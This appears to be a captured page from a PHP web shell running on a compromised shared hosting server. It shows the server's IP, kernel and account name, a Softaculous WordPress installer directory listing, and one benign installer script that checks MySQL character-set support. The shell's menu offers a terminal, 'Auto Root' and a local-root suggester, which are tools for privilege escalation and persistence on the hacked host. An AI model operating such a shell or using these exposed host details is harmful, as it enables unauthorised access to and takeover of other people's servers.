Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.12.151.104
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp59 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
languages
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
php53
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
php56
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
php71
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
php81
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
php82
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
plugins
[ DIR ]
drwxr-xr-x
2025-04-16 14:16
.htaccess
482
B
-rw-r--r--
2022-05-25 07:33
_htaccess
553
B
-rw-r--r--
2022-05-25 07:33
_index.php
59
B
-rw-r--r--
2022-05-25 07:33
_wp-config.php
3.07
KB
-rw-r--r--
2022-05-25 07:33
add_user.php
461
B
-rw-r--r--
2022-05-25 07:33
backup.php
3.01
KB
-rw-r--r--
2025-04-16 11:19
check_charset.php
2.02
KB
-rw-r--r--
2022-05-25 07:33
clone.php
31.07
KB
-rw-r--r--
2025-04-16 11:19
clone.xml
497
B
-rw-r--r--
2022-05-25 07:33
edit.php
9.45
KB
-rw-r--r--
2025-04-16 11:19
edit.xml
1.76
KB
-rw-r--r--
2023-10-03 08:59
extend.php
82.89
KB
-rw-r--r--
2025-04-16 11:19
fileindex.php
291
B
-rw-r--r--
2022-05-25 07:33
import.php
6.54
KB
-rw-r--r--
2025-04-16 11:19
info.xml
14.94
KB
-rw-r--r--
2025-04-16 09:31
install.js
1.46
KB
-rw-r--r--
2025-01-03 13:25
install.php
31.55
KB
-rw-r--r--
2025-04-16 11:19
install.xml
5.65
KB
-rw-r--r--
2025-02-24 07:15
md5
5.86
KB
-rw-r--r--
2025-04-16 11:19
multisite.sql
36.61
KB
-rw-r--r--
2025-04-16 14:16
notes.txt
5.81
KB
-rw-r--r--
2024-02-01 07:49
plugin_activate.php
596
B
-rw-r--r--
2022-05-25 07:33
plugin_deactivate.php
613
B
-rw-r--r--
2022-05-25 07:33
sign_on.php
3.28
KB
-rw-r--r--
2025-01-28 09:17
soft.htaccess
127
B
-rw-r--r--
2022-05-25 07:33
upgrade.php
13.75
KB
-rw-r--r--
2025-04-16 11:19
upgrade.xml
1.59
KB
-rw-r--r--
2023-10-03 08:59
wp-config.php
2.78
KB
-rw-r--r--
2022-05-25 07:33
wp59.sql
29.72
KB
-rw-r--r--
2025-04-16 14:16
wp59.zip
21.94
MB
-rw-r--r--
2025-04-16 14:16
Save
Rename
<?php function __has_cap(){ global $use_mysqli; $use_mysqli = false; if ( function_exists( 'mysqli_connect' ) ) { if ( version_compare( phpversion(), '5.5', '>=' ) || ! function_exists( 'mysql_connect' ) ) { $use_mysqli = true; } elseif ( false !== strpos( '[[wpver]]', '-' ) ) { $use_mysqli = true; } } $version = __db_version(); if ( version_compare( $version, '5.5.3', '<' ) ) { return false; } if ( $use_mysqli ) { $client_version = mysqli_get_client_info(); } else { $client_version = mysql_get_client_info(); } /* * libmysql has supported utf8mb4 since 5.5.3, same as the MySQL server. * mysqlnd has supported utf8mb4 since 5.0.9. */ if ( false !== strpos( $client_version, 'mysqlnd' ) ) { $client_version = preg_replace( '/^\D+([\d.]+).*/', '$1', $client_version ); return version_compare( $client_version, '5.0.9', '>=' ); } else { return version_compare( $client_version, '5.5.3', '>=' ); } return false; } function __db_version() { global $use_mysqli; if ( $use_mysqli ) { $server_info = mysqli_get_server_info( mysqli_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } else { $server_info = mysql_get_server_info( mysql_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } return preg_replace( '/[^0-9.].*/', '', $server_info ); } $has_cap = __has_cap(); // To determine which colllation to use. Added from WP 5.4.2 $dbversion = __db_version(); if ( version_compare( $dbversion, '5.6', '>=' ) ) { $utf8mb4 = 'utf8mb4_520'; }else{ $utf8mb4 = 'utf8mb4'; } if(!empty($has_cap)){ echo '<claim_utf8>'.$utf8mb4.'</claim_utf8>'; } // Server detection /** * Whether the server software is Apache or something else * @global bool $soft_is_apache */ $soft_is_apache = (strpos($_SERVER['SERVER_SOFTWARE'], 'Apache') !== false || strpos($_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') !== false); if(!empty($soft_is_apache)){ echo '<soft_apache>soft_is_apache</soft_apache>'; }else{ echo '<soft_apache>soft_not_apache</soft_apache>'; } ?>